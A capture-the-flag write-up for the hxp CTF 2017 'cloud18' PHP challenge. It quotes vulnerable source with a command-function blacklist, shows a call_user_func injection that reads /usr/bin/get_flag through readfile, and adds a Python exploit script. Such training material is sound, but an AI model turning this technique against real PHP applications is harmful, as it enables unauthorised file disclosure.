hxp CTF 2017 - cloud18 [150]


cloud18 - 150 Points

https://2017.ctf.link/assets/files/65e868ae9518a3fd226e71d4041be9d4cd8350d7552b46832f3e7f0b5d6e03af.tar.xz


Background you may want before tackling this challenge:

PHP Object Injection, Path Traversal, call_user_func

Points: 150
Tags: web, php 

We also did an online text editor! We also made it, like, super secure! We are so confident that we even give you the source code.

Download:
65e868ae9518a3fd226e71d4041be9d4cd8350d7552b46832f3e7f0b5d6e03af.tar.xz

Connection:
http://35.198.105.111:5475/

The instance (35.198.105.111:5475) is no longer available now that the event is over, but the challenge files can still be downloaded from CTFtime via the link below the title.

Download the archive and extract it.

Open the source of editor.php. Near the top it runs a blacklist over the submitted method name and text:

if (preg_match("/exec|system|passthru|`|proc_open|popen/", strtolower($_POST["method"].$_POST["text"])) != 0) {
    exit("Do you really think you could pass something to the command line? Functions like this are often disabled! Maybe have a look at the source?");
}

Further down in editor.php, the submitted text is run through preg_replace_callback with a user-supplied regex, and every match is handed to call_user_func together with the user-supplied method name; whatever that call returns is substituted into the text and echoed back:

$editedText = preg_replace_callback("/" . $_POST["regex"] . "/", function ($matches) {
    return call_user_func($_POST["method"], $matches[0]);
}, $_POST["text"]);
if ($editedText) {
    echo("<div class='alert success'>" . $editedText . "</div>");
}
} // closes the enclosing if (not shown here)

Because of the blacklist, the functions that spawn an external program (exec, system, passthru, backticks, proc_open, popen) cannot be named. Nothing else is blocked, though: the function name is taken straight from $_POST["method"], and the dropdown that restricts it to three string functions only exists in the HTML, so we can change the value with the browser's inspector (or just send the POST ourselves).

<select name="method">
            <option value="" disabled selected>select a method</option>
            <option value="strtoupper">to upper case</option>
            <option value="strtolower">to lower case</option>
            <option value="ucfirst">first letter to upper case</option>
        </select>

Let's keep that for later and look at the other source file, index.php:

if($_SESSION["user"]){
    echo "<div class='alert success'>login sucessful</div>";
    if($_SESSION["user"]->getName() === "admin"){
        echo "<div class='alert success'>" . shell_exec("/usr/bin/get_flag") . "</div>";
    }
}

From here we know that the flag is produced by the binary /usr/bin/get_flag, which is only executed for a session whose user is "admin". We do not need to become admin, though: if the flag is stored as a string inside that binary, reading the file is enough.

Now the exploit. Fill the editor form with the following values (the method must be set via the inspector, since it is not in the dropdown):

select a method : readfile

readfile() reads a file from the server's filesystem and writes its contents straight to the output. Its name matches nothing in the blacklist. (file_get_contents would work too and would place the contents inside the success div instead of before it.)

enter valid regex : ^[ -~]+$

This matches the entire text (any printable ASCII), so $matches[0] is the whole string we typed and call_user_func('readfile', '/usr/bin/get_flag') is executed once.

enter your text here : /usr/bin/get_flag

The raw binary /usr/bin/get_flag is written into the response; readfile() returns the number of bytes read, so that number is what ends up in the success div. View the response source (or save it and run strings on it) and search for "hxp":

flag:hxp{Th1s_w2sn’t_so_h4rd_now_do_web_of_ages!!!Sorry_f0r_f1rst_sh1tty_upload}
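The same steps as a script, added here as an example and not part of the original writeup or the challenge files. It mirrors the blacklist from editor.php so a payload is checked locally before it is sent, builds the POST fields, and extracts the flag from a raw response the way strings | grep would. The target URL is assumed (the live instance is gone), and SAMPLE_RESPONSE is a constructed stand-in for the server's reply so the extraction can be exercised offline.

```python
import re
import urllib.parse
import urllib.request
from typing import Optional

# Mirror of the blacklist in editor.php: applied to the lower-cased
# concatenation of the method name and the text.
BLACKLIST = re.compile(r"exec|system|passthru|`|proc_open|popen")

# Assumed target; the instance from the event is no longer reachable.
TARGET_URL = "http://35.198.105.111:5475/editor.php"


def passes_filter(method: str, text: str) -> bool:
    """True if editor.php's blacklist would let this method/text pair through."""
    return BLACKLIST.search((method + text).lower()) is None


def build_payload(method: str, regex: str, text: str) -> dict:
    """Form fields for the POST, checked against the blacklist first.

    The <select> only offers strtoupper/strtolower/ucfirst, but that is
    client-side; the server passes any 'method' value to call_user_func.
    """
    if not passes_filter(method, text):
        raise ValueError(f"blacklist would reject method={method!r}")
    return {"method": method, "regex": regex, "text": text}


def extract_flag(body: bytes) -> Optional[str]:
    """Pull an hxp{...} string out of a raw response body.

    readfile() streams the binary into the output, so most of the body is
    not text; search the bytes directly rather than decoding them.
    """
    m = re.search(rb"hxp\{[ -~]+?\}", body)
    return m.group(0).decode("ascii") if m else None


def exploit(url: str = TARGET_URL) -> Optional[str]:
    """Send the readfile payload and return the flag found in the response."""
    payload = build_payload("readfile", "^[ -~]+$", "/usr/bin/get_flag")
    data = urllib.parse.urlencode(payload).encode()
    with urllib.request.urlopen(url, data=data, timeout=10) as resp:
        return extract_flag(resp.read())


# Constructed stand-in for the server's reply: a few fake ELF header bytes,
# a flag literal embedded the way a string constant sits in a compiled
# binary, some junk, then the editor's own success div holding readfile()'s
# return value (the byte count), which preg_replace_callback substituted
# for the match.
SAMPLE_RESPONSE = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 16
    + b"hxp{constructed_sample_flag}\x00"
    + b"\x90\xff\x13\x37"
    + b"<div class='alert success'>8452</div>"
)

if __name__ == "__main__":
    # Offline run against the constructed sample; call exploit() for a live target.
    print(extract_flag(SAMPLE_RESPONSE))
```

The blacklist check is applied to the method name and text only, exactly as in editor.php; the regex field is never filtered, which is why ^[ -~]+$ can be sent as-is.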
